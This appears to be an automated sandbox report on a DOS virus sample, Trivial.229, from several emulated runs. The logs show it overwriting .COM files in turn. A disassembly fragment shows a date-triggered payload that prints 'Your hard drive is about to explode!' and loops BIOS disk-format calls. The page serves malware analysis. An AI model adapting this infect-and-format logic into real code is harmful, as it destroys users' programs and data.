Sample viewer

vx.netlux.org/Virus.DOS.Trivial.229

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:20.018608332Z 78 PC: 12a49 | Find first file
2018-12-17T23:01:20.025478167Z 61 PC: 12a51 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:20.034056278Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.044460213Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.059803726Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.073382373Z 61 PC: 12a51 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:01:20.080947009Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.088502363Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.106755902Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.113265568Z 61 PC: 12a51 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:01:20.121028282Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.129188931Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.138977033Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.14204264Z 61 PC: 12a51 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:01:20.149368923Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.157240821Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.165735193Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.168827283Z 61 PC: 12a51 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:01:20.176632083Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.18469027Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.193225603Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.197512914Z 61 PC: 12a51 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:01:20.206072005Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.213947108Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.224036222Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.227711824Z 61 PC: 12a51 | Open file (Filename = 'PAH.COM')
2018-12-17T23:01:20.235422866Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.249602622Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.25840632Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.261367109Z 61 PC: 12a51 | Open file (Filename = 'TEST.COM')
2018-12-17T23:01:20.270089916Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.278590997Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.287174331Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.289896122Z 42 PC: 12a6b | Get date 0x12a6b: cmp dh, 4
0x12a6e: je 0x12a7e
0x12a70: cmp dh, 5
0x12a73: je 0x12a7e
0x12a75: mov ah, 9
0x12a77: mov dx, 0x1ad
0x12a7a: int 0x21
0x12a7c: int 0x20
0x12a7e: mov ah, 9
0x12a80: mov dx, 0x188
0x12a83: int 0x21
0x12a85: mov dx, 0x80
0x12a88: xor ch, ch
0x12a8a: mov ah, 5
0x12a8c: int 0x13
0x12a8e: cmp dh, 0x20
0x12a91: je 0x12a97
0x12a93: inc dh
0x12a95: jmp 0x12a85
0x12a97: cmp ch, 0x20
2018-12-17T23:01:20.293183143Z 9 PC: 12a7c | Display string (String= 'Program too big to fit in memory.')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13828,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:12.648069825Z 78 PC: 12a49 | Find first file
2018-12-25T12:39:12.652140105Z 61 PC: 12a51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:12.660153668Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-25T12:39:12.667603271Z 62 PC: 12a61 | Close file
2018-12-25T12:39:12.685391524Z 79 PC: 12a65 | Find next file
2018-12-25T12:39:12.689332156Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.696842366Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.704259073Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.71359344Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.716847626Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.724671771Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.733648664Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.742269258Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.745123351Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.752743346Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.762569193Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.770933354Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.774137465Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.78272847Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.790904264Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.800476485Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.803497248Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.810830179Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.818903794Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.824142144Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.826309171Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.830680752Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.836075058Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.841430077Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.844187803Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.859525821Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.867154301Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.876513984Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.879851289Z 42 PC: 12a6b | Get date 0x12a6b: cmp dh, 4
0x12a6e: je 0x12a7e
0x12a70: cmp dh, 5
0x12a73: je 0x12a7e
0x12a75: mov ah, 9
0x12a77: mov dx, 0x1ad
0x12a7a: int 0x21
0x12a7c: int 0x20
0x12a7e: mov ah, 9
0x12a80: mov dx, 0x188
0x12a83: int 0x21
0x12a85: mov dx, 0x80
0x12a88: xor ch, ch
0x12a8a: mov ah, 5
0x12a8c: int 0x13
0x12a8e: cmp dh, 0x20
0x12a91: je 0x12a97
0x12a93: inc dh
0x12a95: jmp 0x12a85
0x12a97: cmp ch, 0x20
2018-12-25T12:39:12.882199702Z 9 PC: 12a7c | Display string (String= 'Program too big to fit in memory.')

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13828,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:12.715514869Z 78 PC: 12a49 | Find first file
2018-12-25T12:39:12.722716295Z 61 PC: 12a51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:12.730444222Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-25T12:39:12.740296045Z 62 PC: 12a61 | Close file
2018-12-25T12:39:12.755860384Z 79 PC: 12a65 | Find next file
2018-12-25T12:39:12.760780458Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.76905203Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.777232149Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.786750588Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.789592102Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.796821519Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.805794026Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.814393477Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.817241037Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.825571044Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.833276161Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.842097786Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.846032374Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.853479332Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.858989016Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.864812762Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.868279976Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.876674419Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.884374696Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.892966162Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.894812803Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.900372346Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.905960615Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.911432363Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.913397271Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.918347047Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.920279787Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.925913141Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.929639522Z 42 PC: 12a6b | Get date 0x12a6b: cmp dh, 4
0x12a6e: je 0x12a7e
0x12a70: cmp dh, 5
0x12a73: je 0x12a7e
0x12a75: mov ah, 9
0x12a77: mov dx, 0x1ad
0x12a7a: int 0x21
0x12a7c: int 0x20
0x12a7e: mov ah, 9
0x12a80: mov dx, 0x188
0x12a83: int 0x21
0x12a85: mov dx, 0x80
0x12a88: xor ch, ch
0x12a8a: mov ah, 5
0x12a8c: int 0x13
0x12a8e: cmp dh, 0x20
0x12a91: je 0x12a97
0x12a93: inc dh
0x12a95: jmp 0x12a85
0x12a97: cmp ch, 0x20
2018-12-25T12:39:12.931555058Z 9 PC: 12a85 | Display string (String= 'Your hard drive is about to explode!')

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13828,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:12.740880539Z 78 PC: 12a49 | Find first file
2018-12-25T12:39:12.747087274Z 61 PC: 12a51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:12.753381203Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-25T12:39:12.75961578Z 62 PC: 12a61 | Close file
2018-12-25T12:39:12.772819823Z 79 PC: 12a65 | Find next file
2018-12-25T12:39:12.775594036Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.782086616Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.788721673Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.79687069Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.799376616Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.813961376Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.82381489Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.83149697Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.833925759Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.841053734Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.847441878Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.855003181Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.859179125Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.865754139Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.872278817Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.881142423Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.885308394Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.898470795Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.905791182Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.913290748Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.915776366Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.923560249Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.930768934Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.938773621Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.94200909Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.948788637Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.951834031Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.959953225Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.962726864Z 42 PC: 12a6b | Get date 0x12a6b: cmp dh, 4
0x12a6e: je 0x12a7e
0x12a70: cmp dh, 5
0x12a73: je 0x12a7e
0x12a75: mov ah, 9
0x12a77: mov dx, 0x1ad
0x12a7a: int 0x21
0x12a7c: int 0x20
0x12a7e: mov ah, 9
0x12a80: mov dx, 0x188
0x12a83: int 0x21
0x12a85: mov dx, 0x80
0x12a88: xor ch, ch
0x12a8a: mov ah, 5
0x12a8c: int 0x13
0x12a8e: cmp dh, 0x20
0x12a91: je 0x12a97
0x12a93: inc dh
0x12a95: jmp 0x12a85
0x12a97: cmp ch, 0x20
2018-12-25T12:39:12.964874718Z 9 PC: 12a85 | Display string (String= 'Your hard drive is about to explode!')